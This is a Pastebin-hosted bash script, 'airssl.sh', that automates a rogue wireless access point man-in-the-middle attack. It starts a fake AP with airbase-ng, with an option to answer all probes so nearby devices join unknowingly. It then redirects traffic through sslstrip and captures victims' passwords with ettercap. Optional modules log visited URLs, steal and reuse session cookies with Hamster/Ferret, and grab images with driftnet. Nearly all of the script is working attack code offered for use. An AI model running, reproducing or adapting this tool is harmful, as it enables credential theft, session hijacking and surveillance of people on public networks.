Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
- # airssl.sh - v1.0
- # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
- # Network questions
- echo
- echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
- echo
- route -n -A inet | grep UG
- echo
- echo
- echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
- read -e gatewayip
- echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
- read -e internet_interface
- echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
- read -e fakeap_interface
- echo -n "Enter the ESSID you would like your rogue AP to be called: "
- read -e ESSID
- airmon-ng start $fakeap_interface
- fakeap=$fakeap_interface
- fakeap_interface="mon0"
- # Dhcpd creation
- mkdir -p "/pentest/wireless/airssl"
- echo "authoritative;
- default-lease-time 600;
- max-lease-time 7200;
- subnet 10.0.0.0 netmask 255.255.255.0 {
- option routers 10.0.0.1;
- option subnet-mask 255.255.255.0;
- option domain-name "\"$ESSID\"";
- option domain-name-servers 10.0.0.1;
- range 10.0.0.20 10.0.0.50;
- }" > /pentest/wireless/airssl/dhcpd.conf
- # Fake ap setup
- echo "[+] Configuring FakeAP...."
- echo
- echo "Airbase-ng will run in its most basic mode, would you like to
- configure any extra switches? "
- echo
- echo "Choose Y to see airbase-ng help and add switches. "
- echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
- echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
- echo "Y, N or A "
- read ANSWER
- if [ $ANSWER = "y" ] ; then
- airbase-ng --help
- fi
- if [ $ANSWER = "y" ] ; then
- echo
- echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
- redefined, also in this mode you MUST define a channel "
- read -e aswitch
- echo
- echo "[+] Starting FakeAP..."
- xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
- sleep 2
- fi
- if [ $ANSWER = "a" ] ; then
- echo
- echo "[+] Starting FakeAP..."
- xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
- sleep 2
- fi
- if [ $ANSWER = "n" ] ; then
- echo
- echo "[+] Starting FakeAP..."
- xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
- sleep 2
- fi
- # Tables
- echo "[+] Configuring forwarding tables..."
- ifconfig lo up
- ifconfig at0 up &
- sleep 1
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
- iptables -P FORWARD ACCEPT
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- # DHCP
- echo "[+] Setting up DHCP..."
- touch /var/run/dhcpd.pid
- chown dhcpd:dhcpd /var/run/dhcpd.pid
- xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
- sleep 3
- # Sslstrip
- echo "[+] Starting sslstrip..."
- xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
- sleep 2
- # Ettercap
- echo "[+] Configuring ettercap..."
- echo
- echo "Ettercap will run in its most basic mode, would you like to
- configure any extra switches for example to load plugins or filters,
- (advanced users only), if you are unsure choose N "
- echo "Y or N "
- read ETTER
- if [ $ETTER = "y" ] ; then
- ettercap --help
- fi
- if [ $ETTER = "y" ] ; then
- echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
- For the sake of airssl, ettercap WILL USE -u and -p so you are advised
- NOT to use -M, also -i is already set and CANNOT be redifined here.
- Ettercaps output will be saved to /pentest/wireless/airssl/passwords
- DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
- echo
- read "eswitch"
- echo "[+] Starting ettercap..."
- xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
- sleep 1
- fi
- if [ $ETTER = "n" ] ; then
- echo
- echo "[+] Starting ettercap..."
- xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
- sleep 1
- fi
- # URLSnarf
- echo
- echo "[+] URLSnarf?"
- echo
- echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
- echo "Y or N"
- read URLSN
- if [ $URLSN = "y" ] ; then
- echo
- echo "[+] Starting URLSnarf..."
- xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
- sleep 3
- fi
- #Impliment Ferret / Hamster for cookies!!!
- echo
- echo "[+] Hamster / Ferret?"
- echo
- echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
- echo
- echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
- echo
- echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
- echo
- echo "NOTE: Cookies will be logged, however they will all show up under your local IP address"
- echo "Y or N"
- read HAMSTER
- if [ $HAMSTER = "y" ] ; then
- echo
- echo "[+] Starting Hamster / Ferret..."
- xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
- sleep 1
- xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
- sleep 3
- fi
- # Driftnet
- echo
- echo "[+] Driftnet?"
- echo
- echo "Would you also like to start driftnet to capture the victims images,
- (this may make the network a little slower), "
- echo "Y or N "
- read DRIFT
- if [ $DRIFT = "y" ] ; then
- mkdir -p "/pentest/wireless/airssl/driftnetdata"
- echo "[+] Starting driftnet..."
- driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
- sleep 3
- fi
- xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
- clear
- echo
- echo "[+] Activated..."
- echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
- echo
- echo "[+] IMPORTANT..."
- echo "After you have finished please close airssl and clean up properly by hitting Y,
- if airssl is not closed properly ERRORS WILL OCCUR "
- read WISH
- # Clean up
- if [ $WISH = "y" ] ; then
- echo
- echo "[+] Cleaning up airssl and resetting iptables..."
- kill ${fakeapid}
- kill ${dchpid}
- kill ${sslstripid}
- kill ${ettercapid}
- kill ${dritnetid}
- kill ${sslstriplogid}
- kill ${urlsnid}
- kill ${ferretid}
- kill ${hamsterid}
- airmon-ng stop $fakeap_interface
- airmon-ng stop $fakeap
- echo "0" > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo "[+] Clean up successful..."
- echo "[+] Thank you for using airssl, Good Bye..."
- exit
- fi
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement